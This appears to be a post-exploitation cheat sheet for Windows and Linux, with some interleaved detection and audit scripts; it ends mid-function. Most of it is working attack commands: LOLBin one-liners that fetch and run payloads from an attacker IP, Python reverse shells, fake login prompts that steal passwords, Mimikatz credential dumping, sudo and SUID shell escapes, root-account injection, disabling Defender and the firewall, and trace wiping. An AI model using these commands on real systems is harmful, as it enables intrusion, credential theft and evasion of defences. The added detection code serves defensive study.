>cscript.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

Mshta

>use exploit/windows/misc/hta_server
>set srvhost 192.168.0.107
>mshta http://192.168.0.107:8080/RgNeCv.hta

Execute VBScript:
>mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
Execute JavaScript:
>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
JSRat:
>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Regsvr32

Get an Empire agent
>usestager windows/launcher_sct
Generate the sct file and place it in the web directory
>regsvr32 /s /n /u /i:http://192.168.0.107:8080/launcher.sct scrobj.dll
>cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://192.168.0.107/test.sct

Rundll32

Execute a file
>rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
>rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
>rundll32 url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
>rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
>rundll32 url.dll, FileProtocolHandler calc.exe
Execute without a pop-up window
>rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("C:/Windows/System32/mshta.exe http://192.168.0.107:8080/SU8Fd6kNRz0.hta",0,true);self.close();
Add or delete registry entries
Save the following as a .inf file
>rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=AddReg
DelReg=DelReg
[AddReg]  ; for deletion use DelReg instead: remove the part marked in red in the original, then run
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SYSTEM,0x00000000,c:/windows/temp/sv.exe
0x00010001 denotes the REG_DWORD data type; 0x00000000, or omitting the field (keeping the comma), denotes REG_SZ (string)
Write a file
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);a.WriteLine("Test");a.Close();self.close();
Out-RundllCommand
Use the nishang script Out-RundllCommand to generate the rundll command
>powershell -nop -w h -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Out-RundllCommand.ps1'); Out-RundllCommand -Reverse -IPAddress 192.168.0.107 -Port 12345"

Note: older PowerShell versions only recognise -w hidden for hiding the window; newer versions also accept -w h
Execute a remote PS script
>Out-RundllCommand -PayloadURL http://192.168.0.107/Invoke-PowerShellUdp.ps1 -Arguments "Invoke-PowerShellUdp -Reverse -IPAddress 192.168.0.107 -Port 12138"
Get an MSF session
Generate a script in psh-reflection format
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();r=new%20ActiveXObject("WScript.Shell").run("powershell -w hidden -nologo -noprofile -ep bypass IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.107/xx.ps1'));",0,true);

DotNetToJScript

Execute .NET programs via JS/VBS
https://github.com/tyranid/DotNetToJScript/releases
>DotNetToJScript.exe -o 1.js ExampleAssembly.dll  (generate JS)
>DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll  (generate VBS)
>DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll  (generate VBA)
>DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll  (generate SCT)
StarFighters
https://github.com/Cn33liz/StarFighters can execute PowerShell code; see the project page for details
Execute a single command
$code = 'start calc.exe'
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded
Copy the output as the value of var EncodedPayload
Execute mimikatz remotely
powershell IEX "(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'"
Save the above in code.txt
$code = Get-Content -Path code.txt
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded | Out-File 2.txt

Replace the value of var EncodedPayload with the contents of the generated 2.txt and execute

Execute while bypassing AMSI
>copy c:\windows\system32\cscript.exe amsi.dll
>amsi.dll evil.js

WMIC

Set up an Empire listener, generate the xsl file with the windows/launcher_xsl stager and save it in the web directory
>wmic process get brief /format:http://192.168.0.107:8080/launcher.xsl
It can also be combined with mshta:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("mshta http://192.168.0.107:8080/RgNeCv.hta");
	]]> </ms:script>
</stylesheet>

Msxsl

Download
https://www.microsoft.com/en-us/download/details.aspx?id=21714
Execute shellcode remotely
https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker/blob/master/shellcode.xml
>msxsl.exe http://192.168.0.107/shellcode.xml http://192.168.0.107/shellcode.xml
Generate shellcode with Empire and paste it at the EncodedPayload position in the script

CPL

Listen on Kali

Compile into a DLL

Execute via control
>control C:\Users\Administrator.DC\Desktop\VC6.0green\MyProjects\dll\Debug\dll.dll

Or rename the DLL extension to .cpl and double-click it, or execute it via rundll32
>rundll32.exe shell32.dll,Control_RunDLL C:\Users\Administrator.DC\Desktop\VC6.0green\MyProjects\dll\Debug\dll.dll
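Detection side of the LOLBin techniques in the sections above (MSBuild inline tasks, mshta, regsvr32 scriptlets, cscript with winrm.vbs/pubprn.vbs, rundll32 javascript:/url.dll/setupapi/Control_RunDLL, wmic /format, msxsl, control loading a DLL) plus the renamed cscript.exe copies. Added example, not from the original post; the event records are constructed to resemble Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine) and the rules are heuristics to tune on a real baseline.

```python
import re

# Rule table: (name, image-basename regex, command-line regex). The command-line
# patterns follow the invocations shown on this page; they are heuristics and will
# need tuning against a baseline, since legitimate MSBuild, wmic and control usage exists.
RULES = [
    ("msbuild_inline_task", r"^msbuild\.exe$", r"\.xml\b"),
    ("mshta_remote_or_script", r"^mshta\.exe$", r"(https?://|vbscript:|javascript:)"),
    ("regsvr32_remote_scriptlet", r"^regsvr32\.exe$", r"/i:https?://.*scrobj\.dll"),
    ("pubprn_remote_scriptlet", r"^cscript\.exe$", r"pubprn\.vbs.*\bscript:"),
    ("winrm_vbs_abuse", r"^cscript\.exe$", r"winrm\.vbs"),
    ("rundll32_javascript", r"^rundll32\.exe$", r"javascript:"),
    ("rundll32_url_dll", r"^rundll32\.exe$", r"url\.dll\s*,\s*(OpenURLA?|FileProtocolHandler)"),
    ("rundll32_inf_install", r"^rundll32\.exe$", r"setupapi.*InstallHinfSection"),
    ("rundll32_control_rundll_dll", r"^rundll32\.exe$", r"Control_RunDLL\s+\S*\.dll\b"),
    ("control_loads_dll", r"^control\.exe$", r"\.dll\b"),
    ("wmic_remote_xsl", r"^wmic\.exe$", r"/format:\s*\"?https?://"),
    ("msxsl_remote_xml", r"^msxsl\.exe$", r"https?://"),
]
COMPILED = [(n, re.compile(i, re.I), re.compile(c, re.I)) for n, i, c in RULES]

# Script hosts whose on-disk name should equal the PE's OriginalFileName. The page copies
# cscript.exe to winrm\ and to amsi.dll; the rename changes Image but not OriginalFileName.
RENAME_WATCH = {"cscript.exe", "wscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "msbuild.exe"}


def detect(events):
    """Return (pid, rule_name) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        basename = ev["image"].rsplit("\\", 1)[-1]
        for name, image_re, cmd_re in COMPILED:
            if image_re.search(basename) and cmd_re.search(ev["command_line"]):
                hits.append((ev["pid"], name))
        original = ev.get("original_file_name", "").lower()
        if original in RENAME_WATCH and original != basename.lower():
            hits.append((ev["pid"], "renamed_script_host"))
    return hits


# Constructed sample events (not real telemetry); pids 106 and 107 are benign controls.
SAMPLE_EVENTS = [
    {"pid": 101, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "original_file_name": "MSBuild.exe", "command_line": "msbuild.exe 1.xml"},
    {"pid": 102, "image": r"C:\Windows\System32\mshta.exe", "original_file_name": "MSHTA.EXE",
     "command_line": "mshta http://192.168.0.107:8080/RgNeCv.hta"},
    {"pid": 103, "image": r"C:\Windows\System32\regsvr32.exe", "original_file_name": "REGSVR32.EXE",
     "command_line": "regsvr32 /s /n /u /i:http://192.168.0.107:8080/launcher.sct scrobj.dll"},
    {"pid": 104, "image": r"C:\Windows\System32\wbem\WMIC.exe", "original_file_name": "wmic.exe",
     "command_line": "wmic process get brief /format:http://192.168.0.107:8080/launcher.xsl"},
    {"pid": 105, "image": r"C:\Users\bob\winrm\amsi.dll", "original_file_name": "cscript.exe",
     "command_line": "amsi.dll evil.js"},
    {"pid": 106, "image": r"C:\Windows\System32\rundll32.exe", "original_file_name": "RUNDLL32.EXE",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl,,3"},
    {"pid": 107, "image": r"C:\Windows\System32\notepad.exe", "original_file_name": "NOTEPAD.EXE",
     "command_line": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```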

Runas

#use exploit/windows/local/ask

Token theft

MSF

Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>impersonate_token name\\administrator
&
Meterpreter>ps
Meterpreter>steal_token pid

Cobalt strike

beacon> steal_token 1234  (steal a token)
beacon> rev2self  (restore the original token)
Windows
https://gitee.com/RichChigga/incognito2

Credential theft

Fake lock screen

https://github.com/Pickfordmatt/SharpLocker/releases

https://github.com/bitsadmin/fakelogonscreen/releases

The captured password is saved in
%LOCALAPPDATA%\Microsoft\user.db

Fake authentication prompt

CredsLeaker
https://github.com/Dviros/CredsLeaker
Upload cl_reader.php, config.php and config.cl to the web server
Modify the URL parameter in CredsLeaker.ps1 and run.bat

It closes automatically once the correct password is entered; otherwise it can only be closed by killing the powershell process
Once the correct password is obtained, creds.txt containing the credential info is generated in the directory

LoginPrompt
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-LoginPrompt.ps1');invoke-LoginPrompt"

Unless the process is killed, the dialog can only be closed by entering the correct password.
The result is returned when the correct password is received

Nishang-Invoke-CredentialsPhish
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.108/ps/nishang/Gather/Invoke-CredentialsPhish.ps1'); Invoke-CredentialsPhish"

RottenPotato

https://github.com/foxglovesec/RottenPotato
Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>upload /root/Desktop/rottenpotato.exe
Meterpreter>execute -HC -f rottenpotato.exe
Meterpreter>impersonate_token "NT AUTHORITY\\SYSTEM"

PowerUp

Detect vulnerable services
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Invoke-AllChecks"

>icacls C:\Windows\system32\\wlbsctrl.dll  (check the file permissions: F is full control, M is modify)

The AbuseFunction field shows the exploitation command.
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-HijackDll -OutputFile 'C:\Windows\system32\\wlbsctrl.dll' -Command 'net user admin pass@Qwe1 /add&net localgroup administrators admin /add'"

After a reboot the new user admin has been added

Find processes that may be hijacked
>Find-ProcessDLLHijack
Find directories in the PATH environment variable writable by the current user
>Find-PathDLLHijack
Find auto-logon credentials stored in the registry
>Get-RegistryAutoLogon
Query unquoted service paths (trusted service path)
>Get-ServiceUnquoted
Query registry autorun entries modifiable by the current user
>Get-ModifiableRegistryAutoRun
Query scheduled task files modifiable by the current user
>Get-ModifiableScheduledTaskFile
Query plaintext passwords in all web.config files on the system
>Get-WebConfig

Powerup-AlwaysInstallElevated

>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Get-RegAlwaysInstallElevated"

>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-UserAddMSI"
Run the install as a normal user

AlwaysInstallElevated privilege escalation

>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
A value of 1 means installers are always run with elevated privileges
#HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
Create a DWORD32 DisableMSI=0
#msfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi -o /root/add.msi
#upload /root/add.msi c:\\1.msi
>msiexec /quiet /qn /i c:\1.msi
MSF
#use exploit/windows/local/always_install_elevated
#set session 1

Trusted Service Paths

>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  (list auto-start services whose path is not enclosed in quotes)
#use exploit/windows/local/trusted_service_path
#set session 1
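Audit counterpart of the wmic command above, as an added example that is not part of the original post: it parses the fixed-width wmic table and, for each auto-start service with an unquoted path, lists the directories whose write ACLs decide whether the trusted_service_path case applies. The wmic output below is constructed.

```python
import ntpath
import re


def parse_wmic_table(text):
    """Parse wmic's fixed-width table; column boundaries are taken from the header line."""
    lines = [line.rstrip() for line in text.splitlines() if line.strip()]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    rows = []
    for line in lines[1:]:
        row = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else len(line)
            row[name] = line[start:end].strip()
        rows.append(row)
    return rows


def executable_part(pathname):
    """Everything up to the first .exe, which is what the service control manager resolves."""
    m = re.match(r'\s*"?(.*?\.exe)', pathname, re.I)
    return m.group(1) if m else pathname.strip()


def find_unquoted_service_paths(rows):
    """Auto-start services whose unquoted image path contains spaces outside C:\\Windows.

    For each finding, check_write_acl_on lists the directories in which a non-admin write
    ACL would turn this into a privilege escalation: Windows tries C:\\Program.exe, then
    C:\\Program Files\\Acme.exe, ... before the intended binary (the trusted_service_path case).
    """
    findings = []
    for r in rows:
        path = r["PathName"]
        if r["StartMode"].lower() != "auto" or path.startswith('"'):
            continue
        exe = executable_part(path)
        if exe.lower().startswith("c:\\windows\\") or " " not in exe:
            continue
        parts = exe.split(" ")
        dirs, prefix = [], parts[0]
        for nxt in parts[1:]:
            d = ntpath.dirname(prefix + ".exe")  # directory CreateProcess would search first
            if d not in dirs:
                dirs.append(d)
            prefix += " " + nxt
        findings.append({"name": r["Name"], "path": exe, "check_write_acl_on": dirs})
    return findings


# Constructed wmic output (not from a real host), in wmic's fixed-width layout.
_HEADER = ("DisplayName", "Name", "PathName", "StartMode")
_ROWS = [
    ("Vulnerable Updater", "vulnupd", r"C:\Program Files\Acme Tools\Updater\updater.exe -svc", "Auto"),
    ("Quoted Service", "quoted", r'"C:\Program Files\Good Vendor\good.exe" -run', "Auto"),
    ("Windows Service", "winsvc", r"C:\Windows\System32\svchost.exe -k netsvcs", "Auto"),
    ("Manual Unquoted", "manunq", r"C:\Tools\Some Dir\tool.exe", "Manual"),
]
SAMPLE_WMIC_OUTPUT = "\n".join(f"{d:<22}{n:<10}{p:<58}{s}" for d, n, p, s in [_HEADER] + _ROWS)

if __name__ == "__main__":
    for f in find_unquoted_service_paths(parse_wmic_table(SAMPLE_WMIC_OUTPUT)):
        print(f["name"], f["path"], "-> check ACLs on", f["check_write_acl_on"])
```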

Vulnerable Services

#use exploit/windows/local/service_permissions
#set session 1

Sudo privilege escalation

/home/user/.sudo_as_admin_successful
>sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
>sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
>sudo strace -o /dev/null /bin/bash
>sudo nmap --interactive nmap>!sh
>echo "os.execute('/bin/sh')">/tmp/shell.nse
>sudo nmap --script=/tmp/shell.nse
>sudo more/less/man /etc/rsyslog.conf
>sudo git help status 
>!/bin/bash
>sudo ftp
>!/bin/bash
>sudo vim -c '!sh'
>sudo find /bin/ -name ls -exec /bin/bash ;
>sudo awk 'BEGIN {system("/bin/sh")}'

Linux cron jobs

>for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done  (list all users' crontabs)
$cat /etc/crontab
$echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh
$echo "" > "--checkpoint-action=exec=sh test.sh"
$echo "" > --checkpoint=1
Or edit a writable cron job file:
#!/usr/bin/python
import os,subprocess,socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.107",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Linux SUID privilege escalation

Find SUID files owned by root
$find / -perm -u=s -type f 2>/dev/null
$find / -user root -perm -4000 -print 2>/dev/null
$find / -user root -perm -4000 -exec ls -ldb {} \;

Find

$touch xxx
$/usr/bin/find xxx -exec whoami \;
$/usr/bin/find xxx -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  \;
&
>find xxx -exec netcat -lvp 12138 -e /bin/sh \;  (then connect from the attacking machine)

NMAP

# enter nmap's interactive mode
>nmap --interactive 
>!sh

VIM

>vim.tiny /etc/shadow
&
>vim.tiny
# press ESC
:set shell=/bin/sh
:shell

BASH

>bash -p

More/Less/Man

>less /etc/passwd
!/bin/sh
>more /etc/passwd
!/bin/bash
>man passwd
!/bin/bash

CP/MV

Overwrite the shadow file

Linux /etc/passwd privilege escalation

$ls -lh /etc/passwd  (check whether it is readable and writable by any user)
$perl -le 'print crypt("password@123","addedsalt")'  (generate the password hash)
$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
Add a root user in one command
#useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root  -G root -s /bin/bash -d /home/user venus
Username venus, password 123qwe
#useradd newuser;echo "newuser:password"|chpasswd
>echo "admin:x:0:0::/:/bin/sh" >> /etc/passwd
>passwd admin  (change the password)

Linux Dirty COW privilege escalation

https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty -lcrypt
$./dirty passwd 
Generates an account and password
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s
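Detection counterpart for the /etc/passwd, Dirty COW and Sudo sections above, added here and not part of the original post: it flags extra UID-0 accounts and hashes written straight into /etc/passwd, and sudo rules that grant ALL without a password or any of the shell-escape binaries listed under Sudo privilege escalation. The passwd and sudoers content is constructed inline.

```python
import re

# Binaries from the Sudo section above that can spawn a shell (GTFOBins-style escapes);
# a sudo rule granting any of these is equivalent to granting a root shell.
SHELL_ESCAPE_BINARIES = {"zip", "tar", "strace", "nmap", "more", "less", "man",
                         "git", "ftp", "vim", "find", "awk"}

SUDO_RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<spec>.+)$")
SUDO_TAGS = re.compile(r"\b(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):")


def audit_passwd(text):
    """Flag the edits shown above: extra UID-0 users, hashes placed in field 2, empty passwords."""
    findings, seen = [], set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if name in seen:
            findings.append((name, "duplicate username"))
        seen.add(name)
        if not uid.isdigit():
            findings.append((name, "non-numeric uid"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field (no password required)"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
    return findings


def audit_sudoers(text):
    """Flag NOPASSWD: ALL rules and rules that hand out a shell-escape binary."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue
        spec = m.group("spec")
        nopasswd = "NOPASSWD:" in spec
        for cmd in (c.strip() for c in SUDO_TAGS.sub("", spec).split(",")):
            if not cmd:
                continue
            if cmd == "ALL":
                if nopasswd:
                    findings.append((m.group("who"), "ALL without password"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append((m.group("who"), f"{binary} allows a shell escape"))
    return findings


# Constructed files, not from a real host; the test/admin lines mirror the edits shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash
admin:x:0:0::/:/bin/sh
guest::1001:1001::/home/guest:/bin/sh
"""
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
ignite  ALL=(root) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
dev     ALL=(root) /usr/bin/vim, /usr/bin/find
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_sudoers(SAMPLE_SUDOERS):
        print(*finding, sep=": ")
```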

RDP & Firewall

Brute force

Brute-force RDP with Hydra
>hydra -l admin -P /root/Desktop/passwords -S 192.168.0.0 rdp
&
Nlbrute

Enable via the registry

Check whether the system allows remote connections on 3389:
>REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
1 means disabled, 0 means enabled
Check the remote connection port:
>REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
How to enable 3389 remote connections on the local machine
Via cmd
>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
>REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
Via a .reg file
Contents:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
Import into the registry:
regedit /s a.reg

Enable the service with NETSH

>netsh firewall set service remoteadmin enable 
>netsh firewall set service remotedesktop enable
>netsh firewall set opmode disable  (disable the firewall)

Enable via an injection point

.asp?id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
Note: a changed connection port takes effect after a reboot

Enable via MSF

#run post/windows/manage/enable_rdp

Enable via WMIC

>wmic /node:192.168.1.2 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

Firewall

Allow inbound
If Remote Desktop has never been configured on the system, a firewall rule allowing port 3389 must also be added the first time it is enabled:
>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
>netsh firewall set portopening TCP 3389 ENABLE
Disable the firewall
>netsh firewall set opmode mode=disable
>netsh advfirewall show allprofiles  (show status)
>netsh advfirewall set allprofiles state off 
>sc stop windefend
>sc delete windefend
PS> Set-MpPreference -DisableRealtimeMonitoring 1
PS> Set-MpPreference -Disablearchivescanning $true

Multi-user logon

Use Mimikatz to allow multiple RDP sessions
>privilege::debug
>ts::multirdp
rdpwrap
https://github.com/stascorp/rdpwrap
>RDPWInst.exe -i is

RDP connection history

https://github.com/3gstudent/List-RDP-Connections-History
View the local users' RDP connection history

>Psloggedon.exe username

Remove traces

@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit

Port mapping & forwarding

MSF

Prerequisite: the server has internet access and you have your own public IP
>portfwd add -l 5555 -p 3389 -r 172.16.86.153
Forward the target host's 3389 Remote Desktop port to local port 5555
>portfwd list

lcx.exe

Prerequisite: the server has internet access and you have your own public IP
Target: lcx.exe -slave <public-IP> 9999 127.0.0.1 3389
Linux attacking machine: ./portmap -m 2 -p1 9999 -p2 33889
Windows attacking machine: lcx -listen 9999 33889  (relay traffic received on local port 9999 to port 33889)
PortTran
https://github.com/k8gege/K8tools/raw/master/PortTran.rar
Run on the attacking machine
>PortTranS20.exe 12345 389

Run on the target
>PortTranC20.exe 127.0.0.1 3389 192.168.0.102 12345
Once the connection is established, connect to local port 389 on the attacking machine

SSH

-C compress the traffic, speeding up the transfer
-f go to the background after authenticating
-N forward only, do not open a new shell; -n run in the background
-q quiet mode, do not print any debug information
-l specify the ssh login name
-g allow remote hosts to connect to the local forwarded port
-L local port forwarding
-R remote port forwarding
-D dynamic forwarding, i.e. a socks proxy
-T disable pseudo-terminal allocation
-p specify the remote ssh service port

Forward (local) port forwarding

External target: .110
Internal target: .115
Edit on the local attacking machine, then restart the ssh service
#vim /etc/ssh/sshd_config
AllowTcpForwarding yes   (allow TCP forwarding)
GatewayPorts yes   (allow remote hosts to connect to locally forwarded ports)
TCPKeepAlive yes   (keep TCP sessions alive)
PasswordAuthentication yes   (password authentication)
>ssh -C -f -N -g -L 33890:192.168.0.115:3389 root@192.168.0.110 -p 22
Run on the local attacking machine: local port 33890 is forwarded to the remote 3389 port
Get an MSF session
Attacking machine -- internet-facing Linux target -- isolated Linux target -- isolated Windows machine
>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<isolated-Linux-host> lport=12138 -f exe -o /var/www/html/1.exe
The attacking machine listens on port 12345
On the isolated Linux host
>ssh -C -f -N -g -L 0.0.0.0:12138:<attacking-machine>:12345 root@<internet-facing-Linux-host> -p 22

Reverse (remote) port forwarding

External attacking machine: .107
Internal target: .97
Edit on the internet-facing target, then restart the ssh service
#vim /etc/ssh/sshd_config
AllowTcpForwarding yes   (allow TCP forwarding)
GatewayPorts yes   (allow remote hosts to connect to locally forwarded ports)
TCPKeepAlive yes   (keep TCP sessions alive)
PasswordAuthentication yes   (password authentication)
>ssh -C -f -N -g -R 33890:10.1.1.97:3389 root@192.168.0.107 -p 22
Run on the internet-facing target: forwards port 33890 on the external attacking machine to 3389 on the isolated internal network
>netstat -tnlp

Once forwarding works, install rinetd (a forward TCP forwarding tool) on the external attacking machine: apt install rinetd
>vim /etc/rinetd.conf
Add the line: 0.0.0.0 3389 127.0.0.1 33890
>service rinetd start

Here .107 is the Kali attacking machine; connecting to 107:33890 reaches the desktop of internal host 10.1.1.97
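The sshd_config lines above are what make these forwards work; as an added example (not from the original post) this check reports the effective values using sshd's first-occurrence-wins rule, including the default of AllowTcpForwarding yes when the line is absent. The config excerpt is constructed.

```python
import re

# sshd defaults for the options this section sets (from the sshd_config manual). An absent
# line means the default applies, and when a key is repeated sshd keeps the FIRST value.
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}
# Value that widens the exposure, and why it matters for the forwards shown above.
RISKY = {
    "allowtcpforwarding": ("yes", "logged-in users can open -L/-R/-D forwards through this host"),
    "gatewayports": ("yes", "remote (-R) forwards bind 0.0.0.0 and are reachable from other hosts"),
    "passwordauthentication": ("yes", "password logins, and therefore brute force, are accepted"),
    "permitrootlogin": ("yes", "root can log in directly with a password"),
}


def effective_settings(config_text):
    """Global settings as sshd applies them: first occurrence wins, Match blocks are
    conditional and therefore excluded, defaults fill in anything not set."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"(\S+)\s*[=\s]\s*(.+)", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        settings.setdefault(key, value)  # keeps the first value, as sshd does
    for key, default in DEFAULTS.items():
        settings.setdefault(key, default)
    return settings


def audit_sshd(config_text):
    """Return (key, effective value, reason) for every risky effective setting."""
    s = effective_settings(config_text)
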